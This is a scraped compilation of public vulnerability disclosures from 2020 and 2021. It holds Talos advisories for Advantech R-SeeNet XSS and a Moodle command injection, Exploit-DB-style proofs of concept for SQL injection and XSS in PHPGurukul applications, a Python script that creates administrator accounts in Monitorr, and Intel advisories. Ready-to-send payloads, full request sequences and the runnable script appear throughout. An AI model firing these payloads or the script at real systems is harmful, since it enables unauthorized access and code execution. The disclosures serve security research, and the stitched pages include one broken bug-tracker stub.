Cross-site scripting vulnerabilities exist in the telnet_form.php script functionality of Advantech R-SeeNet v 2.4.12 (20.10.2020). If a user visits a specially crafted URL, it can lead to arbitrary JavaScript code execution in the context of the targeted user’s browser. An attacker can provide a crafted URL to trigger this vulnerability.

**Summary**

Cross-site scripting vulnerabilities exist in the telnet\_form.php script functionality of Advantech R-SeeNet v 2.4.12 (20.10.2020). If a user visits a specially crafted URL, it can lead to arbitrary JavaScript code execution in the context of the targeted user’s browser. An attacker can provide a crafted URL to trigger this vulnerability.

**Tested Versions**

Advantech R-SeeNet 2.4.12 (20.10.2020)

**Product URLs**

https://ep.advantech-bb.cz/products/software/r-seenet

**CVSSv3 Score**

9.6 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

**CWE**

CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)

**Details**

R-SeeNet is the software system used for monitoring Advantech routers. It continuously collects information from individual routers in the network and records the data into a SQL database.

This vulnerability is present in telnet\_form.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.

The telnet\_form.php script accepts hostname parameter coming from the user via a HTTP request:

    php/telnet_form.php
    Line 11	  if(isset($_GET['hostname']) && ($_GET['hostname'] != ''))
    Line 12	  {  // hostname zadano
    Line 13		 $hostname = $_GET['hostname'];
    Line 14	  }	
    

The parameter is not sanitized in a context of XSS payload and further is embedded into HTML code :

    Line 44         <title>Telnet <?php echo($hostname)?></title>
    

Request

    GET /php/telnet_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E%3Ctitle%3E HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: pl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close	
    Upgrade-Insecure-Requests: 1
    

Response HTTP/1.1 200 OK Date: Fri, 05 Mar 2021 16:51:07 GMT Server: Apache/2.2.17 (Win32) mod\_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.5 X-Powered-By: PHP/5.4.45 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 1402 Connection: close Content-Type: text/html; charset=utf-8

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html>
      <head>
    	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    	<meta name="description" content="TODO - info">
    	<meta http-equiv="pragma" content="no-cache">
    	<meta http-equiv="cache-control" content="no-cache">    
    	<title>Telnet </title><script>alert(1)</script><title></title>
    

The victim does not need to be logged-in to be affected by this vulnerability.

**Timeline**

2021-03-11 - Initial contact with vendor  
2021-03-14 - Advisory issued to CISA  
2021-04-13 - Follow up with vendor & CISA  
2021-06-07 - Follow up with vendor & CISA (no response)  
2021-06-22 - Final 90 day notice issued  
2021-07-15 - Public Disclosure

CVE-2021-21799: TALOS-2021-1270 || Cisco Talos Intelligence Group

Cross-site scripting vulnerabilities exist in the ssh_form.php script functionality of Advantech R-SeeNet v 2.4.12 (20.10.2020). If a user visits a specially crafted URL, it can lead to arbitrary JavaScript code execution in the context of the targeted user’s browser. An attacker can provide a crafted URL to trigger this vulnerability.

**Summary**

Cross-site scripting vulnerabilities exist in the ssh\_form.php script functionality of Advantech R-SeeNet v 2.4.12 (20.10.2020). If a user visits a specially crafted URL, it can lead to arbitrary JavaScript code execution in the context of the targeted user’s browser. An attacker can provide a crafted URL to trigger this vulnerability.

**Tested Versions**

Advantech R-SeeNet 2.4.12 (20.10.2020)

**Product URLs**

https://ep.advantech-bb.cz/products/software/r-seenet

**CVSSv3 Score**

9.6 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

**CWE**

CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)

**Details**

R-SeeNet is the software system used for monitoring Advantech routers. It continuously collects information from individual routers in the network and records the data into a SQL database.

This vulnerability is present in ssh\_form.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.

The ssh\_form.php script accepts hostname parameter coming from the user via a HTTP request:

    php/ssh_form.php
    Line 9 	  if(isset($_GET['hostname']) && ($_GET['hostname'] != ''))
    Line 10	  {  // hostname zadano
    Line 11		 $hostname = $_GET['hostname'];
    Line 12	  }	
    

The parameter is not sanitized in a context of XSS payload and further is embedded into a HTML code :

    Line 42     <title>SSH Session <?php echo($hostname)?></title>
    (...)
    Line 63 	<param name="jcterm.destinations"  value="root@<?php echo $hostname?>">
    

Request example

    GET /php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E%3Ctitle%3E HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: pl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    

Response

    HTTP/1.1 200 OK
    Date: Fri, 05 Mar 2021 15:39:09 GMT
    Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.5
    X-Powered-By: PHP/5.3.5
    Content-Length: 1455
    Connection: close
    Content-Type: text/html; charset=utf-8
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html>
      <head>
    	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    	<meta name="description" content="TODO - info">
    	<meta http-equiv="pragma" content="no-cache">
    	<meta http-equiv="cache-control" content="no-cache">    
    	<title>SSH Session </title><script>alert(1)</script>
    

The victim does not need to be logged-in to be affected by this vulnerability.

**Timeline**

2021-03-11 - Initial contact with vendor  
2021-03-14 - Advisory issued to CISA  
2021-04-13 - Follow up with vendor & CISA  
2021-06-07 - Follow up with vendor & CISA (no response)  
2021-06-22 - Final 90 day notice issued  
2021-07-15 - Public disclosure

CVE-2021-21800: TALOS-2021-1271 || Cisco Talos Intelligence Group

Multiple SQL Injection vulnerabilities in Teachers Record Management System 1.0 allow remote authenticated users to execute arbitrary SQL commands via the 'editid' GET parameter in edit-subjects-detail.php, edit-teacher-detail.php, or the 'searchdata' POST parameter in search.php.

    # Exploit Title: Teachers Record Management System 1.0 – Multiple SQL Injection (Authenticated)
    # Date: 05-10-2021
    # Exploit Author: nhattruong
    # Vendor Homepage: https://phpgurukul.com
    # Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
    # Version: 1.0
    # Tested on: Windows 10 + XAMPP v3.2.4
    
    POC:
    1. Go to url http://localhost/login.php
    2. Login with default creds
    3. Execute the payload
    
    Payload #1:
    
    POST /admin/search.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 32
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/trms/admin/search.php
    Cookie: PHPSESSID=4c4g8dedr7omt9kp1j7d6v6fg0
    Upgrade-Insecure-Requests: 1
    
    searchdata=a' or 1=1-- -&search=
    
    Payload #2:
    
    http://local/admin/edit-subjects-detail.php?editid=a' or 1=1-- -
    
    Payload #3:
    
    http://local/admin/edit-teacher-detail.php?editid=a' or 1=1-- -

CVE-2021-28423: OffSec’s Exploit Database Archive

A stored cross-site scripting (XSS) vulnerability in Teachers Record Management System 1.0 allows remote authenticated users to inject arbitrary web script or HTML via the 'email' POST parameter in adminprofile.php.

    # Exploit Title: Teachers Record Management System 1.0 – 'email' Stored Cross-site Scripting (XSS)
    # Date: 05-10-2021
    # Exploit Author: nhattruong
    # Vendor Homepage: https://phpgurukul.com
    # Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
    # Version: 1.0
    # Tested on: Windows 10 + XAMPP v3.2.4
    
    POC:
    1. Go to url http://localhost/admin/index.php
    2. Do login
    3. Execute the payload
    4. Reload page to see the different
    
    Payload:
    
    POST /admin/adminprofile.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 91
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/trms/admin/adminprofile.php
    Cookie: PHPSESSID=8vkht2tvbo774tsjke1t739i7l
    Upgrade-Insecure-Requests: 1
    
    adminname=Adminm&username=admin&mobilenumber=8979555556&email="><script>alert(123);</script>&submit=

CVE-2021-28424: OffSec’s Exploit Database Archive

When a user clicked on an FTP URL containing encoded newline characters (%0A and %0D), the newlines would have been interpreted as such and allowed arbitrary commands to be sent to the FTP server. This vulnerability affects Firefox ESR < 78.10, Thunderbird < 78.10, and Firefox < 88.

Sorry, I can't find "_1702374?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2021-24002: Invalid Bug ID

A command execution vulnerability exists in the default legacy spellchecker plugin in Moodle 3.10. A specially crafted series of HTTP requests can lead to command execution. An attacker must have administrator privileges to exploit this vulnerabilities.

**Summary**

A command execution vulnerability exists in the default legacy spellchecker plugin in Moodle 3.10. A specially crafted series of HTTP requests can lead to command execution. An attacker must have administrator privileges to exploit this vulnerabilities.

**Tested Versions**

Moodle 3.10

**Product URLs**

https://moodle.org/

**CVSSv3 Score**

8.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:L

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**Details**

Moodle is a popular free and open-source learning management system, used by 262 million education users around the world.

Moodle’s security model relies on operating system permissions to prevent arbitrary server-side command execution via the web interface. A typical Moodle installation runs as the web server’s user and according to Moodle’s documentation “It is vital that the \[Moodle\] files are not writeable by the web server user.” If they are, an administrator can gain code execution trivially by installing plugins through the web interface. Moodle administrators can also specify paths to system binaries, as well as upload files to the Moodle data directory (outside of the web root) via course restoration; arbitrary code execution is prevented only because uploaded files do not have the execute bit set.

To exploit the shell injection vulnerability, the administrator sets a path to the legacy server-side spellcheck binary (aspellpath) containing a backtick shell injection and sets PSpellShell as the spellchecking engine. When a server-side spellcheck is requested, lib/editor/tinymce/plugins/spellchecker/classes/PSpellShell.php uses aspellpath to unsafely construct a shell\_exec command. The spellchecker plugin does not have to be enabled.

Reproduction

1.  Set aspellpath. This payload assumes that the Moodle data directory is /var/www/moodledata.
    
          POST /moodle/admin/settings.php?section=systempaths HTTP/1.1
          Host: moodle.example.com
          User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:87.0) Gecko/20100101 Firefox/87.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
          Accept-Language: en-US,en;q=0.5
          Accept-Encoding: gzip, deflate
          Referer: https://moodle.example.com/moodle/admin/settings.php?section=systempaths
          Content-Type: application/x-www-form-urlencoded
          Content-Length: 220
          Origin: https://moodle.example.com
          Connection: close
          Cookie: MoodleSession=XXXXXXXXXXXXXXXXXXXXXXXXXX
          Upgrade-Insecure-Requests: 1
        
          section=systempaths&action=save-settings&sesskey=XXXXXXXXXX&return=&s__pathtophp=&s__pathtodu=&s__aspellpath=%60%2Fusr%2Fbin%2Fid+%3E+%2Fvar%2Fwww%2Fmoodledata%2Fpoc%60&s__pathtodot=&s__pathtogs=%2Fusr%2Fbin%2Fgs&s__pathtopython=
        
    
2.  Set the spell engine to PSpellShell.
    
         POST /moodle/admin/settings.php?section=tinymcespellcheckersettings HTTP/1.1
         Host: moodle.example.com
         User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:87.0) Gecko/20100101 Firefox/87.0
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
         Accept-Language: en-US,en;q=0.5
         Accept-Encoding: gzip, deflate
         Referer: https://moodle.example.com/moodle/admin/settings.php?section=tinymcespellcheckersettings
         Content-Type: application/x-www-form-urlencoded
         Content-Length: 334
         Origin: https://moodle.example.com
         Connection: close
         Cookie: MoodleSession=XXXXXXXXXXXXXXXXXXXXXXXXXX
         Upgrade-Insecure-Requests: 1
            
         section=tinymcespellcheckersettings&action=save-settings&sesskey=XXXXXXXXXX&return=&s_tinymce_spellchecker_spellengine=PSpellShell&s_tinymce_spellchecker_spelllanguagelist=%2BEnglish%3Den%2CDanish%3Dda%2CDutch%3Dnl%2CFinnish%3Dfi%2CFrench%3Dfr%2CGerman%3Dde%2CItalian%3Dit%2CPolish%3Dpl%2CPortuguese%3Dpt%2CSpanish%3Des%2CSwedish%3Dsv
        
    
3.  Invoke the spellcheck using either checkWords or getSuggestions. This step can be performed unauthenticated.
    
         POST /moodle/lib/editor/tinymce/plugins/spellchecker/rpc.php HTTP/1.1
         Host: moodle.example.com
         User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:87.0) Gecko/20100101 Firefox/87.0
         Accept: */*
         Accept-Language: en-US,en;q=0.5
         Accept-Encoding: gzip, deflate
         Content-Type: application/json
         X-Requested-With: XMLHttpRequest
         Content-Length: 57
         Origin: https://moodle.example.com
         Connection: close
            
         {"id":"c0","method":"checkWords","params":["en",["teh"]]}
        
    

Results:

    root@moodle:~# cat /var/www/moodledata/poc
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    

**Timeline**

2021-03-26 - Vendor Disclosure  
2021-04-21 - Vendor updated documentation to suggest best practices after installation  
2021-06-22 - Public Release

Discovered by Adam Reiser of Cisco ASIG.

CVE-2021-21809: TALOS-2021-1277 || Cisco Talos Intelligence Group

Observable response discrepancy in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access.

**Select Your Region**

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Processors Software Developer Guidance Advisory**

**Summary: **

Potential security vulnerabilities in some Intel® Processors may allow information disclosure.  Intel is releasing updated software developer prescriptive guidance to address these potential vulnerabilities.

**Vulnerability Details:**

CVEID:  CVE-2021-0086

Description: Observable response discrepancy in floating-point operations for some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access.

CVSS Base Score: 6.5 Medium

CVSS Vector:  CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

CVEID: CVE-2021-0089

Description: Observable response discrepancy in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access.

CVSS Base Score: 6.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

**Affected Products:**

All Intel® Processor families.

**Recommendations:**

For CVE-2021-0086  Intel recommends that affected software including web browser JavaScript engine that runs on Intel® Processors follow one of the below guidelines: 

•       Process isolation.

•       Use alternatives to NaN-boxing techniques (eg. Dedicated type tag).

•       Constraining FP results before potential type-confused usage.

Additional technical details can be found here.

For CVE-2021-0089 Intel recommends that affected software that runs on Intel® Processors follow one of the below guidelines:

•       Process isolation.

•       Place serializing operations between code gen and execution.

•       Place LFENCE-semantic operations between code gen and execution.

•       Options include LFENCE, SYSCALL/SYSRET

Additional technical details can be found here.

**Acknowledgements:**

Intel would like to thank Enrico Barberis, Hany Ragab, Herbert Bos, and Cristiano Giuffrida from the VUSec group at VU Amsterdam for reporting these issues.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

06/08/2021

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel, processors, chipsets, and desktop boards may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at https://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  
Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2021-0089: INTEL-SA-00516

Improper input validation in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

**Select Your Region**

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2021.1 IPU – BIOS Advisory**

Intel ID:

INTEL-SA-00463

Advisory Category:

Firmware

Impact of vulnerability:

Escalation of Privilege, Denial of Service

Severity rating:

HIGH

Original release:

06/08/2021

Last revised:

06/08/2021

**Summary: **

Potential security vulnerabilities in the BIOS firmware for some Intel® Processors may allow escalation of privilege or denial of service.  Intel is releasing firmware updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2020-12357

Description: Improper initialization in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.5 High

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2020-8670

Description: Race condition in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.5 High

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2020-8700

Description: Improper input validation in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.5 High

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2020-12359

Description: Insufficient control flow management in the firmware for some Intel(R) Processors may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 7.1 High

CVSS Vector: CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2020-12358

Description: Out of bounds write in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable denial of service via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:H

CVEID: CVE-2021-0095

Description: Improper initialization in the firmware for some Intel(R) Processors may allow a privileged user to potentially enable a denial of service via local access.

CVSS Base Score: 6.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

CVEID: CVE-2020-12360

Description: Out of bounds read in the firmware for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 5.6 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N

CVEID: CVE-2020-24486

Description: Improper input validation in the firmware for some Intel(R) Processors may allow an authenticated user to potentially enable denial of service via local access.

CVSS Base Score: 5.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

**Affected Products:**

·       2nd Generation Intel® Xeon® Scalable Processors

·       Intel® Xeon® Scalable Processors

·       Intel® Xeon® Processor D Family

·       Intel® Xeon® Processor E Family

·       Intel® Xeon® Processor E7 v4 Family

·       Intel® Xeon® Processor E3 v6 Family

·       Intel® Xeon® Processor E3 v5 Family

·       Intel® Xeon® Processor E5 v4 Family

·       Intel® Xeon® Processor E5 v3 Family

·       Intel® Xeon® Processor W Family

·       Intel® Core™ Processors with Intel® Hybrid Technology

·       11th Generation Intel® Core™ Processors

·       10th Generation Intel® Core™ Processors

·       8th Generation Intel® Core™ Processors

·       7th Generation Intel® Core™ Processors

·       6th Generation Intel® Core™ processors

·       Intel® Core™ X-series Processors

**Recommendations:**

Intel recommends that users of the affected products update to the latest firmware version provided by the system manufacturer that addresses these issues.

**Acknowledgements:**

Intel would like to thank NVIDIA Product Security Team (CVE-2020-24486) and Intel employee Hareesh Khattri (CVE-2020-12357) for their reports.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

06/08/2021

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel, processors, chipsets, and desktop boards may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at https://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  
Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2020-8700: INTEL-SA-00463

Cross Site Scripting (XSS) in the "add-services.php" component of PHPGurukul Beauty Parlour Management System v1.0 allows remote attackers to execute arbitrary code by injecting arbitrary HTML into the "sername" parameter.

    # Exploit Title: Beauty Parlour Management System 1.0 - 'Add Services' Cross-Site Scripting# Date: 19/2/2021# Exploit Author: Thinkland Security Team# Vendor Homepage: https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/# Software Link: https://phpgurukul.com/wp-content/uploads/2019/08/Beauty-Parlour-Management-System.zip# Version : V 1.0# Vulnerability Type: Cross-site Scripting# Tested on Windows 10 、XAMPP# This application is vulnerable to cross-site scripting vulnerability.# Vulnerable script:1.go to http://localhost/bpms/admin/ Sign in.2.go to http://localhost/bpms/admin/add-services.php，Click on Services —— Add Services，Fill in Services name <img src=1 onerror=alert(/xss/)>，Click on Add.3.Click on Manage Services，You will see your Javascript code executed.# poc：POST /bpms/admin/add-services.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 71Origin: http://localhostConnection: closeReferer: http://localhost/bpms/admin/add-services.phpCookie: PHPSESSID=qaqv7jl8dqci4i2nldnj4n60s0Upgrade-Insecure-Requests: 1sername=%3Cimg+src%3D1+onerror%3Dalert%28%2Fxss%2F%29%3E&cost=1&submit=

CVE-2021-27544: Beauty Parlour Management System 1.0 Cross Site Scripting ≈ Packet Storm

An authorization bypass vulnerability in Monitorr v1.7.6m in Monitorr/assets/config/_installation/_register.php allows an unauthorized person to create valid credentials.

    #!/usr/bin/python
    # -*- coding: UTF-8 -*-
    
    # Exploit Title: Monitorr 1.7.6m - Authorization Bypass
    # Date: September 12, 2020
    # Exploit Author: Lyhin's Lab
    # Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
    # Software Link: https://github.com/Monitorr/Monitorr
    # Version: 1.7.6m
    # Tested on: Ubuntu 19
    
    # Monitorr 1.7.6m allows creation of administrative accounts by abusing the installation URL.
    
    import requests
    import os
    import sys
    
    if len (sys.argv) != 5:
    	print ("specify params in format: python " + sys.argv[0] + " target_url user_login user_email user_password")
    else:
        url = sys.argv[1] + "/assets/config/_installation/_register.php?action=register"
        headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": url, "Connection": "close", "Referer": url, "Upgrade-Insecure-Requests": "1"}
        data = {"user_name": sys.argv[2], "user_email": sys.argv[3], "user_password_new": sys.argv[4], "user_password_repeat": sys.argv[4], "register": "Register"}
        requests.post(url, headers=headers, data=data)
        print ("Done.")

Tag

#firefox